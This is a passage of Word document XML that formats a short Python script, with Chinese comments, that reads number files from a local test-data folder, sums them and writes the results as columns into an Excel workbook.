          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(txt_dir+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>txt</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>f:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        content = f.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>read</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data = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>parseTxt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(content)</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">single_num </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            sum = sum + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(single_num)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        single_row.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>extend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(data)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        single_row.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>append</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(sum)</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>single_row</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>全局变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">txt_dir = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"./SRTE_testdata/36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>组数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">outputdir = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"./SRTE_testdata/generateExcels/"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">excelDir = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"result.xlsx"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>main</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    wb = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Workbook</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my_sheet = wb.active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    data = []</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    txts = os.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>listdir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(txt_dir)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>txts:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        ret_single_row_list = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>convert2excel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(txt)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>append</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(ret_single_row_list)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>行添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># for single_row in data:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    #     my_sheet.append(single_row)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>列添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">columns = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(*data))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">column </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>columns:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        my_sheet.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>append</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(column)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    wb.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
